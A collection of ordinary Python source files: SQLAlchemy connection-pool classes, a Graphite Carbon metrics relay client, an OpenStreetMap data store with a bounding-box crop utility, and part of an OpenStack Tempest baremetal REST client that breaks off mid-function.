self._conn.current = weakref.ref(c)
if len(self._all_conns) >= self.size:
self._cleanup()
self._all_conns.add(c)
return c
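# Usage sketch matching the class docstring above (sqlite3 in-memory
# database assumed; illustrative only):
#
#   import sqlite3
#   from sqlalchemy.pool import SingletonThreadPool
#
#   p = SingletonThreadPool(lambda: sqlite3.connect(":memory:"), pool_size=5)
#   c1 = p.connect()
#   c2 = p.connect()   # same checked-out connection within this thread
#   c1.close()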
class QueuePool(Pool):
"""A :class:`.Pool` that imposes a limit on the number of open connections.
:class:`.QueuePool` is the default pooling implementation used for
all :class:`.Engine` objects, unless the SQLite dialect is in use.
"""
def __init__(self, creator, pool_size=5, max_overflow=10, timeout=30,
**kw):
"""
Construct a QueuePool.
:param creator: a callable function that returns a DB-API
connection object, same as that of :paramref:`.Pool.creator`.
:param pool_size: The size of the pool to be maintained,
defaults to 5. This is the largest number of connections that
will be kept persistently in the pool. Note that the pool
begins with no connections; once this number of connections
is requested, that number of connections will remain.
``pool_size`` can be set to 0 to indicate no size limit; to
disable pooling, use a :class:`~sqlalchemy.pool.NullPool`
instead.
:param max_overflow: The maximum overflow size of the
pool. When the number of checked-out connections reaches the
size set in pool_size, additional connections will be
returned up to this limit. When those additional connections
are returned to the pool, they are disconnected and
discarded. It follows then that the total number of
simultaneous connections the pool will allow is pool_size +
`max_overflow`, and the total number of "sleeping"
connections the pool will allow is pool_size. `max_overflow`
can be set to -1 to indicate no overflow limit; no limit
will be placed on the total number of concurrent
connections. Defaults to 10.
:param timeout: The number of seconds to wait before giving up
on returning a connection. Defaults to 30.
:param \**kw: Other keyword arguments including
:paramref:`.Pool.recycle`, :paramref:`.Pool.echo`,
:paramref:`.Pool.reset_on_return` and others are passed to the
:class:`.Pool` constructor.
"""
Pool.__init__(self, creator, **kw)
self._pool = sqla_queue.Queue(pool_size)
self._overflow = 0 - pool_size
self._max_overflow = max_overflow
self._timeout = timeout
self._overflow_lock = threading.Lock()
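# Sizing sketch for the parameters above: with pool_size=5 and
# max_overflow=10, at most 5 + 10 = 15 connections can be checked out at
# once, and at most 5 are kept when idle. Values below are illustrative.
#
#   import sqlite3
#   from sqlalchemy.pool import QueuePool
#
#   p = QueuePool(lambda: sqlite3.connect("example.db"),
#                 pool_size=5, max_overflow=10, timeout=30)
#   conns = [p.connect() for _ in range(15)]
#   # a 16th connect() would wait up to 30 seconds, then raise TimeoutError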
def _do_return_conn(self, conn):
try:
self._pool.put(conn, False)
except sqla_queue.Full:
try:
conn.close()
finally:
self._dec_overflow()
def _do_get(self):
use_overflow = self._max_overflow > -1
try:
wait = use_overflow and self._overflow >= self._max_overflow
return self._pool.get(wait, self._timeout)
except sqla_queue.Empty:
if use_overflow and self._overflow >= self._max_overflow:
if not wait:
return self._do_get()
else:
raise exc.TimeoutError(
"QueuePool limit of size %d overflow %d reached, "
"connection timed out, timeout %d" %
(self.size(), self.overflow(), self._timeout))
if self._inc_overflow():
try:
return self._create_connection()
except:
with util.safe_reraise():
self._dec_overflow()
else:
return self._do_get()
def _inc_overflow(self):
if self._max_overflow == -1:
self._overflow += 1
return True
with self._overflow_lock:
if self._overflow < self._max_overflow:
self._overflow += 1
return True
else:
return False
def _dec_overflow(self):
if self._max_overflow == -1:
self._overflow -= 1
return True
with self._overflow_lock:
self._overflow -= 1
return True
def recreate(self):
self.logger.info("Pool recreating")
return self.__class__(self._creator, pool_size=self._pool.maxsize,
max_overflow=self._max_overflow,
timeout=self._timeout,
recycle=self._recycle, echo=self.echo,
logging_name=self._orig_logging_name,
use_threadlocal=self._use_threadlocal,
reset_on_return=self._reset_on_return,
_dispatch=self.dispatch,
_dialect=self._dialect)
def dispose(self):
while True:
try:
conn = self._pool.get(False)
conn.close()
except sqla_queue.Empty:
break
self._overflow = 0 - self.size()
self.logger.info("Pool disposed. %s", self.status())
def status(self):
return "Pool size: %d Connections in pool: %d "\
"Current Overflow: %d Current Checked out "\
"connections: %d" % (self.size(),
self.checkedin(),
self.overflow(),
self.checkedout())
def size(self):
return self._pool.maxsize
def checkedin(self):
return self._pool.qsize()
def overflow(self):
return self._overflow
def checkedout(self):
return self._pool.maxsize - self._pool.qsize() + self._overflow
class NullPool(Pool):
"""A Pool which does not pool connections.
Instead it literally opens and closes the underlying DB-API connection
per each connection open/close.
Reconnect-related functions such as ``recycle`` and connection
invalidation are not supported by this Pool implementation, since
no connections are held persistently.
.. versionchanged:: 0.7
:class:`.NullPool` is used by the SQLite dialect automatically
when a file-based database is used. See :ref:`sqlite_toplevel`.
"""
def status(self):
return "NullPool"
def _do_return_conn(self, conn):
conn.close()
def _do_get(self):
return self._create_connection()
def recreate(self):
self.logger.info("Pool recreating")
return self.__class__(self._creator,
recycle=self._recycle,
echo=self.echo,
logging_name=self._orig_logging_name,
use_threadlocal=self._use_threadlocal,
reset_on_return=self._reset_on_return,
_dispatch=self.dispatch,
_dialect=self._dialect)
def dispose(self):
pass
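# Usage sketch (sqlite3 assumed): each checkout opens a brand new DB-API
# connection and each check-in really closes it, so nothing is retained.
#
#   import sqlite3
#   from sqlalchemy.pool import NullPool
#
#   p = NullPool(lambda: sqlite3.connect("example.db"))
#   conn = p.connect()
#   conn.close()   # the underlying DB-API connection is closed here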
class StaticPool(Pool):
"""A Pool of exactly one connection, used for all requests.
Reconnect-related functions such as ``recycle`` and connection
invalidation (which is also used to support auto-reconnect) are not
currently supported by this Pool implementation but may be implemented
in a future release.
"""
@memoized_property
def _conn(self):
return self._creator()
@memoized_property
def connection(self):
return _ConnectionRecord(self)
def status(self):
return "StaticPool"
def dispose(self):
if '_conn' in self.__dict__:
self._conn.close()
self._conn = None
def recreate(self):
self.logger.info("Pool recreating")
return self.__class__(creator=self._creator,
recycle=self._recycle,
use_threadlocal=self._use_threadlocal,
reset_on_return=self._reset_on_return,
echo=self.echo,
logging_name=self._orig_logging_name,
_dispatch=self.dispatch,
_dialect=self._dialect)
def _create_connection(self):
return self._conn
def _do_return_conn(self, conn):
pass
def _do_get(self):
return self.connection
class AssertionPool(Pool):
"""A :class:`.Pool` that allows at most one checked out connection at
any given time.
This will raise an exception if more than one connection is checked out
at a time. Useful for debugging code that is using more connections
than desired.
.. versionchanged:: 0.7
:class:`.AssertionPool` also logs a traceback of where
the original connection was checked out, and reports
this in the assertion error raised.
"""
def __init__(self, *args, **kw):
self._conn = None
self._checked_out = False
self._store_traceback = kw.pop('store_traceback', True)
self._checkout_traceback = None
Pool.__init__(self, *args, **kw)
def status(self):
return "AssertionPool"
def _do_return_conn(self, conn):
if not self._checked_out:
raise AssertionError("connection is not checked out")
self._checked_out = False
assert conn is self._conn
def dispose(self):
self._checked_out = False
if self._conn:
self._conn.close()
def recreate(self):
self.logger.info("Pool recreating")
return self.__class__(self._creator, echo=self.echo,
logging_name=self._orig_logging_name,
_dispatch=self.dispatch,
_dialect=self._dialect)
def _do_get(self):
if self._checked_out:
if self._checkout_traceback:
suffix = ' at:\n%s' % ''.join(
chop_traceback(self._checkout_traceback))
else:
suffix = ''
raise AssertionError("connection is already checked out" + suffix)
if not self._conn:
self._conn = self._create_connection()
self._checked_out = True
if self._store_traceback:
self._checkout_traceback = traceback.format_stack()
return self._conn
class _DBProxy(object):
"""Layers connection pooling behavior on top of a standard DB-API module.
Proxies a DB-API 2.0 connect() call to a connection pool keyed to the
specific connect parameters. Other functions and attributes are delegated
to the underlying DB-API module.
"""
def __init__(self, module, poolclass=QueuePool, **kw):
"""Initializes a new proxy.
module
a DB-API 2.0 module
poolclass
a Pool class, defaulting to QueuePool
Other parameters are sent to the Pool object's constructor.
"""
self.module = module
self.kw = kw
self.poolclass = poolclass
self.pools = {}
self._create_pool_mutex = threading.Lock()
def close(self):
for key in list(self.pools):
del self.pools[key]
def __del__(self):
self.close()
def __getattr__(self, key):
return getattr(self.module, key)
def get_pool(self, *args, **kw):
key = self._serialize(*args, **kw)
try:
return self.pools[key]
except KeyError:
self._create_pool_mutex.acquire()
try:
if key not in self.pools:
kw.pop('sa_pool_key', None)
pool = self.poolclass(
lambda: self.module.connect(*args, **kw), **self.kw)
self.pools[key] = pool
return pool
else:
return self.pools[key]
finally:
self._create_pool_mutex.release()
def connect(self, *args, **kw):
"""Activate a connection to the database.
Connect to the database using this DBProxy's module and the given
connect arguments. If the arguments match an existing pool, the
connection will be returned from the pool's current thread-local
connection instance, or if there is no thread-local connection
instance it will be checked out from the set of pooled connections.
If the pool has no available connections and allows new connections
to be created, a new database connection will be made.
"""
return self.get_pool(*args, **kw).connect()
def dispose(self, *args, **kw):
"""Dispose the pool referenced by the given connect arguments."""
key = self._serialize(*args, **kw)
try:
del self.pools[key]
except KeyError:
pass
def _serialize(self, *args, **kw):
if "sa_pool_key" in kw:
return kw['sa_pool_key']
return tuple(
list(args) +
[(k, kw[k]) for k in sorted(kw)]
)
|
|
from collections import deque
from time import time
from twisted.application.service import Service
from twisted.internet import reactor
from twisted.internet.defer import Deferred, DeferredList
from twisted.internet.protocol import ReconnectingClientFactory
from twisted.protocols.basic import Int32StringReceiver
from carbon.conf import settings
from carbon.util import pickle
from carbon import instrumentation, log, pipeline, state
try:
import signal
except ImportError:
log.debug("Couldn't import signal module")
SEND_QUEUE_LOW_WATERMARK = settings.MAX_QUEUE_SIZE * settings.QUEUE_LOW_WATERMARK_PCT
class CarbonClientProtocol(Int32StringReceiver):
def connectionMade(self):
log.clients("%s::connectionMade" % self)
self.paused = False
self.connected = True
self.transport.registerProducer(self, streaming=True)
# Define internal metric names
self.lastResetTime = time()
self.destinationName = self.factory.destinationName
self.queuedUntilReady = 'destinations.%s.queuedUntilReady' % self.destinationName
self.sent = 'destinations.%s.sent' % self.destinationName
self.batchesSent = 'destinations.%s.batchesSent' % self.destinationName
self.slowConnectionReset = 'destinations.%s.slowConnectionReset' % self.destinationName
self.factory.connectionMade.callback(self)
self.factory.connectionMade = Deferred()
self.sendQueued()
def connectionLost(self, reason):
log.clients("%s::connectionLost %s" % (self, reason.getErrorMessage()))
self.connected = False
def pauseProducing(self):
self.paused = True
def resumeProducing(self):
self.paused = False
self.sendQueued()
def stopProducing(self):
self.disconnect()
def disconnect(self):
if self.connected:
self.transport.unregisterProducer()
self.transport.loseConnection()
self.connected = False
def sendDatapoint(self, metric, datapoint):
self.factory.enqueue(metric, datapoint)
reactor.callLater(settings.TIME_TO_DEFER_SENDING, self.sendQueued)
def _sendDatapoints(self, datapoints):
self.sendString(pickle.dumps(datapoints, protocol=-1))
instrumentation.increment(self.sent, len(datapoints))
instrumentation.increment(self.batchesSent)
self.factory.checkQueue()
def sendQueued(self):
"""This should be the only method that will be used to send stats.
In order to not hold the event loop and prevent stats from flowing
in while we send them out, this will process
settings.MAX_DATAPOINTS_PER_MESSAGE stats, send them, and if there
are still items in the queue, this will invoke reactor.callLater
to schedule another run of sendQueued after a reasonable enough time
for the destination to process what it has just received.
Given a queue size of one million stats, and using a
chained_invocation_delay of 0.0001 seconds, you'd get 1,000
sendQueued() invocations/second max. With a
settings.MAX_DATAPOINTS_PER_MESSAGE of 100, the rate of stats being
sent could theoretically be as high as 100,000 stats/sec, or
6,000,000 stats/minute. This is probably too high for a typical
receiver to handle.
In practice this theoretical max shouldn't be reached because
network delays should add an extra delay - probably on the order
of 10ms per send, so the queue should drain with an order of
minutes, which seems more realistic.
"""
chained_invocation_delay = 0.0001
queueSize = self.factory.queueSize
if self.paused:
instrumentation.max(self.queuedUntilReady, queueSize)
return
if not self.factory.hasQueuedDatapoints():
return
if settings.USE_RATIO_RESET is True:
if not self.connectionQualityMonitor():
self.resetConnectionForQualityReasons("Sent: {0}, Received: {1}".format(
instrumentation.prior_stats.get(self.sent, 0),
instrumentation.prior_stats.get('metricsReceived', 0)))
self._sendDatapoints(self.factory.takeSomeFromQueue())
if (self.factory.queueFull.called and
queueSize < SEND_QUEUE_LOW_WATERMARK):
if not self.factory.queueHasSpace.called:
self.factory.queueHasSpace.callback(queueSize)
if self.factory.hasQueuedDatapoints():
reactor.callLater(chained_invocation_delay, self.sendQueued)
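# Worked form of the throughput estimate in the docstring above; the
# figures are taken from that docstring and real-world rates are lower
# because of network latency.
#
#   invocations_per_sec = 1000          # stated sendQueued() ceiling
#   datapoints_per_message = 100        # settings.MAX_DATAPOINTS_PER_MESSAGE
#   stats_per_sec = invocations_per_sec * datapoints_per_message   # 100,000
#   stats_per_min = stats_per_sec * 60                             # 6,000,000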
def connectionQualityMonitor(self):
"""Checks to see if the connection for this factory appears to
be delivering stats at a speed close to what we're receiving
them at.
This is open to other measures of connection quality.
Returns a Bool
True means that quality is good, OR
True means that the total received is less than settings.MIN_RESET_STAT_FLOW
False means that quality is bad
"""
destination_sent = float(instrumentation.prior_stats.get(self.sent, 0))
total_received = float(instrumentation.prior_stats.get('metricsReceived', 0))
instrumentation.increment(self.slowConnectionReset, 0)
if total_received < settings.MIN_RESET_STAT_FLOW:
return True
if (destination_sent / total_received) < settings.MIN_RESET_RATIO:
return False
else:
return True
def resetConnectionForQualityReasons(self, reason):
"""Only re-sets the connection if it's been
settings.MIN_RESET_INTERVAL seconds since the last re-set.
Reason should be a string containing the quality info that led to
a re-set.
"""
if (time() - self.lastResetTime) < float(settings.MIN_RESET_INTERVAL):
return
else:
self.factory.connectedProtocol.disconnect()
self.lastResetTime = time()
instrumentation.increment(self.slowConnectionReset)
log.clients("%s:: resetConnectionForQualityReasons: %s" % (self, reason))
def __str__(self):
return 'CarbonClientProtocol(%s:%d:%s)' % (self.factory.destination)
__repr__ = __str__
class CarbonClientFactory(ReconnectingClientFactory):
maxDelay = 5
def __init__(self, destination):
self.destination = destination
self.destinationName = ('%s:%d:%s' % destination).replace('.', '_')
self.host, self.port, self.carbon_instance = destination
self.addr = (self.host, self.port)
self.started = False
# This factory maintains protocol state across reconnects
self.queue = deque() # Change to make this the sole source of metrics to be sent.
self.connectedProtocol = None
self.queueEmpty = Deferred()
self.queueFull = Deferred()
self.queueFull.addCallback(self.queueFullCallback)
self.queueHasSpace = Deferred()
self.queueHasSpace.addCallback(self.queueSpaceCallback)
self.connectFailed = Deferred()
self.connectionMade = Deferred()
self.connectionLost = Deferred()
# Define internal metric names
self.attemptedRelays = 'destinations.%s.attemptedRelays' % self.destinationName
self.fullQueueDrops = 'destinations.%s.fullQueueDrops' % self.destinationName
self.queuedUntilConnected = 'destinations.%s.queuedUntilConnected' % self.destinationName
self.relayMaxQueueLength = 'destinations.%s.relayMaxQueueLength' % self.destinationName
def queueFullCallback(self, result):
state.events.cacheFull()
log.clients('%s send queue is full (%d datapoints)' % (self, result))
def queueSpaceCallback(self, result):
if self.queueFull.called:
log.clients('%s send queue has space available' % self.connectedProtocol)
self.queueFull = Deferred()
self.queueFull.addCallback(self.queueFullCallback)
state.events.cacheSpaceAvailable()
self.queueHasSpace = Deferred()
self.queueHasSpace.addCallback(self.queueSpaceCallback)
def buildProtocol(self, addr):
self.connectedProtocol = CarbonClientProtocol()
self.connectedProtocol.factory = self
return self.connectedProtocol
def startConnecting(self): # calling this startFactory yields recursion problems
self.started = True
self.connector = reactor.connectTCP(self.host, self.port, self)
def stopConnecting(self):
self.started = False
self.stopTrying()
if self.connectedProtocol and self.connectedProtocol.connected:
return self.connectedProtocol.disconnect()
@property
def queueSize(self):
return len(self.queue)
def hasQueuedDatapoints(self):
return bool(self.queue)
def takeSomeFromQueue(self):
"""Use self.queue, which is a collections.deque, to pop up to
settings.MAX_DATAPOINTS_PER_MESSAGE items from the left of the
queue.
"""
def yield_max_datapoints():
for count in range(settings.MAX_DATAPOINTS_PER_MESSAGE):
try:
yield self.queue.popleft()
except IndexError:
# Queue drained early: end the generator normally. (Raising
# StopIteration inside a generator is an error under PEP 479.)
return
return list(yield_max_datapoints())
def checkQueue(self):
"""Check if the queue is empty. If the queue isn't empty or
doesn't exist yet, then this will invoke the callback chain on the
self.queryEmpty Deferred chain with the argument 0, and will
re-set the queueEmpty callback chain with a new Deferred
object.
"""
if not self.queue:
self.queueEmpty.callback(0)
self.queueEmpty = Deferred()
def enqueue(self, metric, datapoint):
self.queue.append((metric, datapoint))
def enqueue_from_left(self, metric, datapoint):
self.queue.appendleft((metric, datapoint))
def sendDatapoint(self, metric, datapoint):
instrumentation.increment(self.attemptedRelays)
instrumentation.max(self.relayMaxQueueLength, self.queueSize)
if self.queueSize >= settings.MAX_QUEUE_SIZE:
if not self.queueFull.called:
self.queueFull.callback(self.queueSize)
instrumentation.increment(self.fullQueueDrops)
else:
self.enqueue(metric, datapoint)
if self.connectedProtocol:
reactor.callLater(settings.TIME_TO_DEFER_SENDING, self.connectedProtocol.sendQueued)
else:
instrumentation.increment(self.queuedUntilConnected)
def sendHighPriorityDatapoint(self, metric, datapoint):
"""The high priority datapoint is one relating to the carbon
daemon itself. It puts the datapoint on the left of the deque,
ahead of other stats, so that when the carbon-relay, specifically,
is overwhelmed its stats are more likely to make it through and
expose the issue at hand.
In addition, these stats go on the deque even when the max stats
capacity has been reached. This relies on not creating the deque
with a fixed max size.
"""
instrumentation.increment(self.attemptedRelays)
self.enqueue_from_left(metric, datapoint)
if self.connectedProtocol:
reactor.callLater(settings.TIME_TO_DEFER_SENDING, self.connectedProtocol.sendQueued)
else:
instrumentation.increment(self.queuedUntilConnected)
def startedConnecting(self, connector):
log.clients("%s::startedConnecting (%s:%d)" % (self, connector.host, connector.port))
def clientConnectionLost(self, connector, reason):
ReconnectingClientFactory.clientConnectionLost(self, connector, reason)
log.clients("%s::clientConnectionLost (%s:%d) %s" % (self, connector.host, connector.port, reason.getErrorMessage()))
self.connectedProtocol = None
self.connectionLost.callback(0)
self.connectionLost = Deferred()
def clientConnectionFailed(self, connector, reason):
ReconnectingClientFactory.clientConnectionFailed(self, connector, reason)
log.clients("%s::clientConnectionFailed (%s:%d) %s" % (self, connector.host, connector.port, reason.getErrorMessage()))
self.connectFailed.callback(dict(connector=connector, reason=reason))
self.connectFailed = Deferred()
def disconnect(self):
self.queueEmpty.addCallback(lambda result: self.stopConnecting())
readyToStop = DeferredList(
[self.connectionLost, self.connectFailed],
fireOnOneCallback=True,
fireOnOneErrback=True)
self.checkQueue()
# This can happen if the client is stopped before a connection is ever made
if (not readyToStop.called) and (not self.started):
readyToStop.callback(None)
return readyToStop
def __str__(self):
return 'CarbonClientFactory(%s:%d:%s)' % self.destination
__repr__ = __str__
class CarbonClientManager(Service):
def __init__(self, router):
self.router = router
self.client_factories = {} # { destination : CarbonClientFactory() }
def startService(self):
if 'signal' in globals().keys():
log.debug("Installing SIG_IGN for SIGHUP")
signal.signal(signal.SIGHUP, signal.SIG_IGN)
Service.startService(self)
for factory in self.client_factories.values():
if not factory.started:
factory.startConnecting()
def stopService(self):
Service.stopService(self)
self.stopAllClients()
def startClient(self, destination):
if destination in self.client_factories:
return
log.clients("connecting to carbon daemon at %s:%d:%s" % destination)
self.router.addDestination(destination)
factory = self.client_factories[destination] = CarbonClientFactory(destination)
connectAttempted = DeferredList(
[factory.connectionMade, factory.connectFailed],
fireOnOneCallback=True,
fireOnOneErrback=True)
if self.running:
factory.startConnecting() # this can trigger & replace connectFailed
return connectAttempted
def stopClient(self, destination):
factory = self.client_factories.get(destination)
if factory is None:
return
self.router.removeDestination(destination)
stopCompleted = factory.disconnect()
stopCompleted.addCallback(lambda result: self.disconnectClient(destination))
return stopCompleted
def disconnectClient(self, destination):
factory = self.client_factories.pop(destination)
c = factory.connector
if c and c.state == 'connecting' and not factory.hasQueuedDatapoints():
c.stopConnecting()
def stopAllClients(self):
deferreds = []
for destination in list(self.client_factories):
deferreds.append( self.stopClient(destination) )
return DeferredList(deferreds)
def sendDatapoint(self, metric, datapoint):
for destination in self.router.getDestinations(metric):
self.client_factories[destination].sendDatapoint(metric, datapoint)
def sendHighPriorityDatapoint(self, metric, datapoint):
for destination in self.router.getDestinations(metric):
self.client_factories[destination].sendHighPriorityDatapoint(metric, datapoint)
def __str__(self):
return "<%s[%x]>" % (self.__class__.__name__, id(self))
class RelayProcessor(pipeline.Processor):
plugin_name = 'relay'
def process(self, metric, datapoint):
state.client_manager.sendDatapoint(metric, datapoint)
return pipeline.Processor.NO_OUTPUT
|
|
from __future__ import print_function
from . import o5m, osmxml
# ****** generic osm data store ******
class OsmData(object):
def __init__(self):
self.nodes=[]
self.ways=[]
self.relations=[]
self.bounds=[]
self.isDiff = False
def LoadFromO5m(self, fi):
dec = o5m.O5mDecode(fi)
dec.funcStoreNode = self.StoreNode
dec.funcStoreWay = self.StoreWay
dec.funcStoreRelation = self.StoreRelation
dec.funcStoreBounds = self.StoreBounds
dec.funcStoreIsDiff = self.StoreIsDiff
dec.DecodeHeader()
eof = False
while not eof:
eof = dec.DecodeNext()
def SaveToO5m(self, fi):
enc = o5m.O5mEncode(fi)
enc.StoreIsDiff(self.isDiff)
for bbox in self.bounds:
enc.StoreBounds(bbox)
for nodeData in self.nodes:
enc.StoreNode(*nodeData)
enc.Reset()
for wayData in self.ways:
enc.StoreWay(*wayData)
enc.Reset()
for relationData in self.relations:
enc.StoreRelation(*relationData)
enc.Finish()
def LoadFromOsmXml(self, fi):
dec = osmxml.OsmXmlDecode(fi)
dec.funcStoreNode = self.StoreNode
dec.funcStoreWay = self.StoreWay
dec.funcStoreRelation = self.StoreRelation
dec.funcStoreBounds = self.StoreBounds
dec.funcStoreIsDiff = self.StoreIsDiff
eof = False
while not eof:
eof = dec.DecodeNext()
def SaveToOsmXml(self, fi):
enc = osmxml.OsmXmlEncode(fi)
enc.StoreIsDiff(self.isDiff)
for bbox in self.bounds:
enc.StoreBounds(bbox)
for nodeData in self.nodes:
enc.StoreNode(*nodeData)
for wayData in self.ways:
enc.StoreWay(*wayData)
for relationData in self.relations:
enc.StoreRelation(*relationData)
enc.Finish()
def StoreNode(self, objectId, metaData, tags, pos):
self.nodes.append([objectId, metaData, tags, pos])
def StoreWay(self, objectId, metaData, tags, refs):
self.ways.append([objectId, metaData, tags, refs])
def StoreRelation(self, objectId, metaData, tags, refs):
self.relations.append([objectId, metaData, tags, refs])
def StoreBounds(self, bbox):
self.bounds.append(bbox)
def StoreIsDiff(self, isDiff):
self.isDiff = isDiff
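# Minimal round-trip sketch for OsmData; the file names and open() modes
# are assumptions for illustration only.
#
#   data = OsmData()
#   with open("input.osm", "rb") as fi:
#       data.LoadFromOsmXml(fi)
#   with open("output.o5m", "wb") as fo:
#       data.SaveToO5m(fo)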
class OsmChange(object):
def __init__(self):
self.create = OsmData()
self.modify = OsmData()
self.delete = OsmData()
self.dec = None
def ChangeStart(self, changeType):
#print "start", changeType
if changeType == "create":
self.dec.funcStoreNode = self.create.StoreNode
self.dec.funcStoreWay = self.create.StoreWay
self.dec.funcStoreRelation = self.create.StoreRelation
if changeType == "modify":
self.dec.funcStoreNode = self.modify.StoreNode
self.dec.funcStoreWay = self.modify.StoreWay
self.dec.funcStoreRelation = self.modify.StoreRelation
if changeType == "delete":
self.dec.funcStoreNode = self.delete.StoreNode
self.dec.funcStoreWay = self.delete.StoreWay
self.dec.funcStoreRelation = self.delete.StoreRelation
def ChangeEnd(self, changeType):
#print "end", changeType
self.dec.funcStoreNode = None
self.dec.funcStoreWay = None
self.dec.funcStoreRelation = None
def LoadFromOscXml(self, fi):
self.dec = osmxml.OsmXmlDecode(fi)
self.dec.funcChangeStart = self.ChangeStart
self.dec.funcChangeEnd = self.ChangeEnd
eof = False
while not eof:
eof = self.dec.DecodeNext()
self.dec = None
#Utility functions
def Crop(osmData, bbox):
#Get nodes in bbox
nodesInBbox = set()
nodeDict = {}
for node in osmData.nodes:
objId, metaData, tags, [lat, lon] = node
nodeDict[objId] = (objId, metaData, tags, [lat, lon])
if lon < bbox[0] or lon > bbox[2] or lat < bbox[1] or lat > bbox[3]:
continue
nodesInBbox.add(objId)
#Get ways in bbox
waysInQuery = set()
wayDict = {}
nodesInQuery = nodesInBbox.copy()
for way in osmData.ways:
objId, metaData, tags, members = way
wayDict[objId] = way
membersSet = set(members)
nodesInMembers = len(membersSet.intersection(nodesInBbox))
if nodesInMembers == 0:
continue
nodesInQuery.update(members)
waysInQuery.add(objId)
#Get relations in bbox
relationsInQuery = set()
relationDict = {}
for relation in osmData.relations:
hit = False
objId, metaData, tags, members = relation
relationDict[objId] = relation
for memTy, memId, memRole in members:
hit = (memTy == "node" and memId in nodesInQuery)
if hit: break
hit = (memTy == "way" and memId in waysInQuery)
if hit: break
if not hit:
continue
relationsInQuery.add(objId)
#Get parent relations
relationsAndParents = relationsInQuery.copy()
uncheckedRelations = relationsInQuery.copy()
for i in range(10):
if len(uncheckedRelations) == 0:
break
foundRelations = set()
for objId, metaData, tags, members in osmData.relations:
hit = False
for memTy, memId, memRole in members:
hit = (memTy == "relation" and memId in uncheckedRelations)
if hit: break
if not hit:
continue
if objId not in relationsAndParents:
foundRelations.add(objId)
relationsAndParents.update(foundRelations)
uncheckedRelations = foundRelations
#Copy results to object
outOsmData = OsmData()
for objId in nodesInQuery:
outOsmData.nodes.append(nodeDict[objId])
for objId in waysInQuery:
outOsmData.ways.append(wayDict[objId])
for objId in relationsAndParents:
outOsmData.relations.append(relationDict[objId])
outOsmData.bounds = [bbox]
return outOsmData
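# Usage sketch for Crop(); the bounding box ordering implied by the
# comparisons above is [min_lon, min_lat, max_lon, max_lat], and the
# coordinates below are illustrative.
#
#   bbox = [13.3, 52.4, 13.5, 52.6]
#   cropped = Crop(data, bbox)
#   print(len(cropped.nodes), len(cropped.ways), len(cropped.relations))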
def IndexObjectsById(osmData):
out = {'nodes': {}, 'ways': {}, 'relations': {}}
for objId, metaData, tags, pos in osmData.nodes:
out['nodes'][objId] = metaData, tags, pos
for objId, metaData, tags, members in osmData.ways:
out['ways'][objId] = metaData, tags, members
for objId, metaData, tags, members in osmData.relations:
out['relations'][objId] = metaData, tags, members
return out
|
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.services.baremetal import base
class BaremetalClient(base.BaremetalClient):
"""Base Tempest REST client for Ironic API v1."""
version = '1'
uri_prefix = 'v1'
@base.handle_errors
def list_nodes(self, **kwargs):
"""List all existing nodes."""
return self._list_request('nodes', **kwargs)
@base.handle_errors
def list_chassis(self):
"""List all existing chassis."""
return self._list_request('chassis')
@base.handle_errors
def list_chassis_nodes(self, chassis_uuid):
"""List all nodes associated with a chassis."""
return self._list_request('/chassis/%s/nodes' % chassis_uuid)
@base.handle_errors
def list_ports(self, **kwargs):
"""List all existing ports."""
return self._list_request('ports', **kwargs)
@base.handle_errors
def list_node_ports(self, uuid):
"""List all ports associated with the node."""
return self._list_request('/nodes/%s/ports' % uuid)
@base.handle_errors
def list_nodestates(self, uuid):
"""List all existing states."""
return self._list_request('/nodes/%s/states' % uuid)
@base.handle_errors
def list_ports_detail(self, **kwargs):
"""Details list all existing ports."""
return self._list_request('/ports/detail', **kwargs)
@base.handle_errors
def list_drivers(self):
"""List all existing drivers."""
return self._list_request('drivers')
@base.handle_errors
def show_node(self, uuid):
"""Gets a specific node.
:param uuid: Unique identifier of the node in UUID format.
:return: Serialized node as a dictionary.
"""
return self._show_request('nodes', uuid)
@base.handle_errors
def show_node_by_instance_uuid(self, instance_uuid):
"""Gets a node associated with given instance uuid.
:param instance_uuid: UUID of the instance associated with the node.
:return: Serialized node as a dictionary.
"""
uri = '/nodes/detail?instance_uuid=%s' % instance_uuid
return self._show_request('nodes',
uuid=None,
uri=uri)
@base.handle_errors
def show_chassis(self, uuid):
"""Gets a specific chassis.
:param uuid: Unique identifier of the chassis in UUID format.
:return: Serialized chassis as a dictionary.
"""
return self._show_request('chassis', uuid)
@base.handle_errors
def show_port(self, uuid):
"""Gets a specific port.
:param uuid: Unique identifier of the port in UUID format.
:return: Serialized port as a dictionary.
"""
return self._show_request('ports', uuid)
@base.handle_errors
def show_port_by_address(self, address):
"""Gets a specific port by address.
:param address: MAC address of the port.
:return: Serialized port as a dictionary.
"""
uri = '/ports/detail?address=%s' % address
return self._show_request('ports', uuid=None, uri=uri)
def show_driver(self, driver_name):
"""Gets a specific driver.
:param driver_name: Name of driver.
:return: Serialized driver as a dictionary.
"""
return self._show_request('drivers', driver_name)
@base.handle_errors
def create_node(self, chassis_id=None, **kwargs):
"""Create a baremetal node with the specified parameters.
:param cpu_arch: CPU architecture of the node. Default: x86_64.
:param cpus: Number of CPUs. Default: 8.
:param local_gb: Disk size. Default: 1024.
:param memory_mb: Available RAM. Default: 4096.
:param driver: Driver name. Default: "fake"
:return: A tuple with the server response and the created node.
"""
node = {'chassis_uuid': chassis_id,
'properties': {'cpu_arch': kwargs.get('cpu_arch', 'x86_64'),
'cpus': kwargs.get('cpus', 8),
'local_gb': kwargs.get('local_gb', 1024),
'memory_mb': kwargs.get('memory_mb', 4096)},
'driver': kwargs.get('driver', 'fake')}
return self._create_request('nodes', node)
@base.handle_errors
def create_chassis(self, **kwargs):
"""Create a chassis with the specified parameters.
:param description: The description of the chassis.
Default: test-chassis
:return: A tuple with the server response and the created chassis.
"""
chassis = {'description': kwargs.get('description', 'test-chassis')}
return self._create_request('chassis', chassis)
@base.handle_errors
def create_port(self, node_id, **kwargs):
"""Create a port with the specified parameters.
:param node_id: The ID of the node which owns the port.
:param address: MAC address of the port.
:param extra: Meta data of the port. Default: {'foo': 'bar'}.
:param uuid: UUID of the port.
:return: A tuple with the server response and the created port.
"""
port = {'extra': kwargs.get('extra', {'foo': 'bar'}),
'uuid': kwargs['uuid']}
if node_id is not None:
port['node_uuid'] = node_id
if kwargs['address'] is not None:
